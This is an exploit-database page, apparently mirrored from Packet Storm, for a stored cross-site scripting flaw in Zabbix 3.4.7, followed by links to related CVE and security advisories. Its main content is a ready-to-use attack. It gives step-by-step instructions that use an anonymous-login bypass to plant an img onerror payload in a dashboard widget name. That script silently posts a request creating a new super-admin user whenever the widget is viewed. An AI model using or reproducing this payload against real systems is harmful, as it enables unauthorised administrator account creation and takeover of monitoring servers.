Lucene search
Radmil GazizovPACKETSTORM:162032HistoryMar 31, 2021 - 12:00 a.m.
Zabbix 3.4.7 Cross Site Scripting
2021-03-3100:00:00
Radmil Gazizov
packetstormsecurity.com
767
`# Exploit Title: Zabbix 3.4.7 - Stored XSS
# Date: 30-03-2021
# Exploit Author: Radmil Gazizov
# Vendor Homepage: https://www.zabbix.com/
# Software Link: https://www.zabbix.com/rn/rn3.4.7
# Version: 3.4.7
# Tested on: Linux
# Reference -
https://github.com/GloryToMoon/POC_codes/blob/main/zabbix_stored_xss_347.txt
1- Go to /zabbix/zabbix.php?action=dashboard.list (anonymous login CVE-2019-17382)
2- Create new dashboard
3- Add a new widget => Type: Map nabigation tree
4- Past into parameter "Name": <img src="x" onerror="var n='hck',q=jQuery;q.post('users.php',{sid:q('#sid').attr('value'),form:'Create+user',alias:n,name:n,surname:n,'user_groups[]':7,password1:n,password2:n,theme:'default',refresh:'9s',rows_per_page:9,url:'',user_type:3,add:'Add'});">
5- Click to "Add" button
`
Related
zdt
zdt
Zabbix 3.4.7 - Stored XSS Vulnerability
2021-03-30 00:00:00
prion
prion
Design/Logic Flaw
2019-10-09 14:15:00
debiancve
debiancve
CVE-2019-17382
2019-10-09 14:15:00
ubuntucve
ubuntucve
CVE-2019-17382
2019-10-09 00:00:00
exploitdb
exploitdb
Zabbix 3.4.7 - Stored XSS
2021-03-31 00:00:00
cve
cve
CVE-2019-17382
2019-10-09 14:15:00
nuclei
nuclei
Zabbix <=4.4 - Authentication Bypass
2020-07-07 04:17:27
nessus
nessus
Debian DLA-3538-1 : zabbix - LTS security update
2023-08-22 00:00:00
osv
osv
zabbix - security update
2023-08-22 00:00:00
openvas
openvas
Debian: Security Advisory (DLA-3538-1)
2023-08-22 00:00:00
debian
debian
[SECURITY] [DLA 3538-1] zabbix security update
2023-08-22 13:22:21
Related for PACKETSTORM:162032